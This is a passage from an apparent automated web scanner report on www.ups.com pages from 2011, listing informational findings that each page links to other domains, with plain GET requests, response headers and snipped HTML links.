<li><a href="http://ccc01.opinionlab.com/o.asp?id=WmcejheE&t1=0&t2=0&referrer=www.ups.com" target="_blank"><img title="[+] Site Feedback" alt="[+] Site Feedback" src="/img/icn_plus_white.gif" width="9" height="9">
...[SNIP]...
<li><a href="http://www.upsjobs.com/?WT.svl=Footer">Careers</a>
...[SNIP]...

6.16. http://www.ups.com/content/us/en/locations/alliances/index.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/locations/alliances/index.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /content/us/en/locations/alliances/index.html?WT.svl=PNRO_L1 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:15 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 33670


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<li><a href="http://ccc01.opinionlab.com/o.asp?id=WmcejheE&t1=0&t2=0&referrer=www.ups.com" target="_blank"><img title="[+] Site Feedback" alt="[+] Site Feedback" src="/img/icn_plus_white.gif" width="9" height="9">
...[SNIP]...
<li><a href="http://www.upsjobs.com/?WT.svl=Footer">Careers</a>
...[SNIP]...

6.17. http://www.ups.com/content/us/en/locations/aso/index.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/locations/aso/index.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /content/us/en/locations/aso/index.html?WT.svl=PNRO_L1 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:15 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 36708


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<li><a href="http://ccc01.opinionlab.com/o.asp?id=WmcejheE&t1=0&t2=0&referrer=www.ups.com" target="_blank"><img title="[+] Site Feedback" alt="[+] Site Feedback" src="/img/icn_plus_white.gif" width="9" height="9">
...[SNIP]...
<li><a href="http://www.upsjobs.com/?WT.svl=Footer">Careers</a>
...[SNIP]...

6.18. http://www.ups.com/content/us/en/locations/custcenters/index.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/locations/custcenters/index.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /content/us/en/locations/custcenters/index.html?WT.svl=PNRO_L1 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:13 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 36727


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<li><a href="http://ccc01.opinionlab.com/o.asp?id=WmcejheE&t1=0&t2=0&referrer=www.ups.com" target="_blank"><img title="[+] Site Feedback" alt="[+] Site Feedback" src="/img/icn_plus_white.gif" width="9" height="9">
...[SNIP]...
<li><a href="http://www.upsjobs.com/?WT.svl=Footer">Careers</a>
...[SNIP]...

6.19. http://www.ups.com/content/us/en/locations/dropboxes/index.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/locations/dropboxes/index.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /content/us/en/locations/dropboxes/index.html?WT.svl=PNRO_L1 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:12 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 36993


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<li><a href="http://ccc01.opinionlab.com/o.asp?id=WmcejheE&t1=0&t2=0&referrer=www.ups.com" target="_blank"><img title="[+] Site Feedback" alt="[+] Site Feedback" src="/img/icn_plus_white.gif" width="9" height="9">
...[SNIP]...
<li><a href="http://www.upsjobs.com/?WT.svl=Footer">Careers</a>
...[SNIP]...

6.20. http://www.ups.com/content/us/en/locations/store/index.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/locations/store/index.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /content/us/en/locations/store/index.html?WT.svl=PNRO_L1 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:11 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 37951


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<br>
<A href="http://theupsstore.com/promise" target="Learn More About The Pack &amp; Ship Promise">Learn More About The Pack &amp; Ship Promise</A>
...[SNIP]...
<BR><A href="http://www.theupsstore.com/products/corretsol.html">Learn More About Corporate Retail Solutions</A>
...[SNIP]...
<li><a href="http://ccc01.opinionlab.com/o.asp?id=WmcejheE&t1=0&t2=0&referrer=www.ups.com" target="_blank"><img title="[+] Site Feedback" alt="[+] Site Feedback" src="/img/icn_plus_white.gif" width="9" height="9">
...[SNIP]...
<li><a href="http://www.upsjobs.com/?WT.svl=Footer">Careers</a>
...[SNIP]...

6.21. http://www.ups.com/content/us/en/myups/billing/index.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/myups/billing/index.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /content/us/en/myups/billing/index.html?WT.svl=PNRO_L1 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:12 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 39346


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<li><a href="http://ccc01.opinionlab.com/o.asp?id=WmcejheE&t1=0&t2=0&referrer=www.ups.com" target="_blank"><img title="[+] Site Feedback" alt="[+] Site Feedback" src="/img/icn_plus_white.gif" width="9" height="9">
...[SNIP]...
<li><a href="http://www.upsjobs.com/?WT.svl=Footer">Careers</a>
...[SNIP]...

6.22. http://www.ups.com/content/us/en/myups/mgmt/index.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/myups/mgmt/index.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /content/us/en/myups/mgmt/index.html?WT.svl=PNRO_L1 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:12 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 33227


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<li><a href="http://ccc01.opinionlab.com/o.asp?id=WmcejheE&t1=0&t2=0&referrer=www.ups.com" target="_blank"><img title="[+] Site Feedback" alt="[+] Site Feedback" src="/img/icn_plus_white.gif" width="9" height="9">
...[SNIP]...
<li><a href="http://www.upsjobs.com/?WT.svl=Footer">Careers</a>
...[SNIP]...

6.23. http://www.ups.com/content/us/en/register/help/index.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/register/help/index.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /content/us/en/register/help/index.html?WT.svl=SubNav HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:22 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 32033


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<li><a href="http://ccc01.opinionlab.com/o.asp?id=WmcejheE&t1=0&t2=0&referrer=www.ups.com" target="_blank"><img title="[+] Site Feedback" alt="[+] Site Feedback" src="/img/icn_plus_white.gif" width="9" height="9">
...[SNIP]...
<li><a href="http://www.upsjobs.com/?WT.svl=Footer">Careers</a>
...[SNIP]...

6.24. http://www.ups.com/content/us/en/register/reasons/index.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/register/reasons/index.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /content/us/en/register/reasons/index.html?WT.svl=SubNav HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:21 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 35843


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<li><a href="http://ccc01.opinionlab.com/o.asp?id=WmcejheE&t1=0&t2=0&referrer=www.ups.com" target="_blank"><img title="[+] Site Feedback" alt="[+] Site Feedback" src="/img/icn_plus_white.gif" width="9" height="9">
...[SNIP]...
<li><a href="http://www.upsjobs.com/?WT.svl=Footer">Careers</a>
...[SNIP]...

6.25. http://www.ups.com/content/us/en/resources/index.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/resources/index.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /content/us/en/resources/index.html?WT.svl=PriNav HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:24:58 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 63123


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<li><a href="http://ccc01.opinionlab.com/o.asp?id=WmcejheE&t1=0&t2=0&referrer=www.ups.com" target="_blank"><img title="[+] Site Feedback" alt="[+] Site Feedback" src="/img/icn_plus_white.gif" width="9" height="9">
...[SNIP]...
<li><a href="http://www.upsjobs.com/?WT.svl=Footer">Careers</a>
...[SNIP]...

6.26. http://www.ups.com/content/us/en/resources/pay/index.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/resources/pay/index.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /content/us/en/resources/pay/index.html?WT.svl=PNRO_L1 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:06 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 44682


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<li><a href="http://ccc01.opinionlab.com/o.asp?id=WmcejheE&t1=0&t2=0&referrer=www.ups.com" target="_blank"><img title="[+] Site Feedback" alt="[+] Site Feedback" src="/img/icn_plus_white.gif" width="9" height="9">
...[SNIP]...
<li><a href="http://www.upsjobs.com/?WT.svl=Footer">Careers</a>
...[SNIP]...

6.27. http://www.ups.com/content/us/en/resources/service/delivery_change.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/resources/service/delivery_change.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /content/us/en/resources/service/delivery_change.html?WT.svl=Footer HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:04 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 37526


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<li><a href="http://ccc01.opinionlab.com/o.asp?id=WmcejheE&t1=0&t2=0&referrer=www.ups.com" target="_blank"><img title="[+] Site Feedback" alt="[+] Site Feedback" src="/img/icn_plus_white.gif" width="9" height="9">
...[SNIP]...
<li><a href="http://www.upsjobs.com/?WT.svl=Footer">Careers</a>
...[SNIP]...

6.28. http://www.ups.com/content/us/en/resources/service/index.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/resources/service/index.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /content/us/en/resources/service/index.html?WT.svl=PNRO_L1 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:04 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 43003


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<li><a href="http://ccc01.opinionlab.com/o.asp?id=WmcejheE&t1=0&t2=0&referrer=www.ups.com" target="_blank"><img title="[+] Site Feedback" alt="[+] Site Feedback" src="/img/icn_plus_white.gif" width="9" height="9">
...[SNIP]...
<li><a href="http://www.upsjobs.com/?WT.svl=Footer">Careers</a>
...[SNIP]...

6.29. http://www.ups.com/content/us/en/resources/ship/fraud.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/resources/ship/fraud.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /content/us/en/resources/ship/fraud.html?WT.svl=Footer HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:03 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 63906


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<IMG src="/img/icn_arrow_blue.gif"><A href="http://www.ftc.gov" target=new>Visit the Federal Trade Commission</A>
...[SNIP]...
<IMG src="/img/icn_arrow_blue.gif"><A href="http://www.ic3.gov" target=new>Visit the Internet Crime Complaint Center</A>
...[SNIP]...
<div class="arrow-blue"><a href="http://www.adobe.com">Get Adobe Reader</a>
...[SNIP]...
<li><a href="http://ccc01.opinionlab.com/o.asp?id=WmcejheE&t1=0&t2=0&referrer=www.ups.com" target="_blank"><img title="[+] Site Feedback" alt="[+] Site Feedback" src="/img/icn_plus_white.gif" width="9" height="9">
...[SNIP]...
<li><a href="http://www.upsjobs.com/?WT.svl=Footer">Careers</a>
...[SNIP]...

6.30. http://www.ups.com/content/us/en/resources/ship/index.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/resources/ship/index.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /content/us/en/resources/ship/index.html?WT.svl=PNRO_L1 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:24:59 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 55142


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<li><a href="http://ccc01.opinionlab.com/o.asp?id=WmcejheE&t1=0&t2=0&referrer=www.ups.com" target="_blank"><img title="[+] Site Feedback" alt="[+] Site Feedback" src="/img/icn_plus_white.gif" width="9" height="9">
...[SNIP]...
<li><a href="http://www.upsjobs.com/?WT.svl=Footer">Careers</a>
...[SNIP]...

6.31. http://www.ups.com/content/us/en/resources/ship/terms/privacy.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/resources/ship/terms/privacy.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /content/us/en/resources/ship/terms/privacy.html?WT.svl=Footer HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:01 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 50535


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<li><a href="http://ccc01.opinionlab.com/o.asp?id=WmcejheE&t1=0&t2=0&referrer=www.ups.com" target="_blank"><img title="[+] Site Feedback" alt="[+] Site Feedback" src="/img/icn_plus_white.gif" width="9" height="9">
...[SNIP]...
<li><a href="http://www.upsjobs.com/?WT.svl=Footer">Careers</a>
...[SNIP]...

6.32. http://www.ups.com/content/us/en/resources/ship/terms/shipping/index.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/resources/ship/terms/shipping/index.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /content/us/en/resources/ship/terms/shipping/index.html?WT.svl=Footer HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:24:59 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 35473


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<li><a href="http://ccc01.opinionlab.com/o.asp?id=WmcejheE&t1=0&t2=0&referrer=www.ups.com" target="_blank"><img title="[+] Site Feedback" alt="[+] Site Feedback" src="/img/icn_plus_white.gif" width="9" height="9">
...[SNIP]...
<li><a href="http://www.upsjobs.com/?WT.svl=Footer">Careers</a>
...[SNIP]...

6.33. http://www.ups.com/content/us/en/resources/ship/terms/use.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/resources/ship/terms/use.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /content/us/en/resources/ship/terms/use.html?WT.svl=Footer HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:00 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 75898


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<li><a href="http://ccc01.opinionlab.com/o.asp?id=WmcejheE&t1=0&t2=0&referrer=www.ups.com" target="_blank"><img title="[+] Site Feedback" alt="[+] Site Feedback" src="/img/icn_plus_white.gif" width="9" height="9">
...[SNIP]...
<li><a href="http://www.upsjobs.com/?WT.svl=Footer">Careers</a>
...[SNIP]...

6.34. http://www.ups.com/content/us/en/resources/start/index.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/resources/start/index.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /content/us/en/resources/start/index.html?WT.svl=PNRO_L1 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:24:59 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 42800


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<li><a href="http://ccc01.opinionlab.com/o.asp?id=WmcejheE&t1=0&t2=0&referrer=www.ups.com" target="_blank"><img title="[+] Site Feedback" alt="[+] Site Feedback" src="/img/icn_plus_white.gif" width="9" height="9">
...[SNIP]...
<li><a href="http://www.upsjobs.com/?WT.svl=Footer">Careers</a>
...[SNIP]...

6.35. http://www.ups.com/content/us/en/resources/techsupport/index.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/resources/techsupport/index.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /content/us/en/resources/techsupport/index.html?WT.svl=PNRO_L1 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:07 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
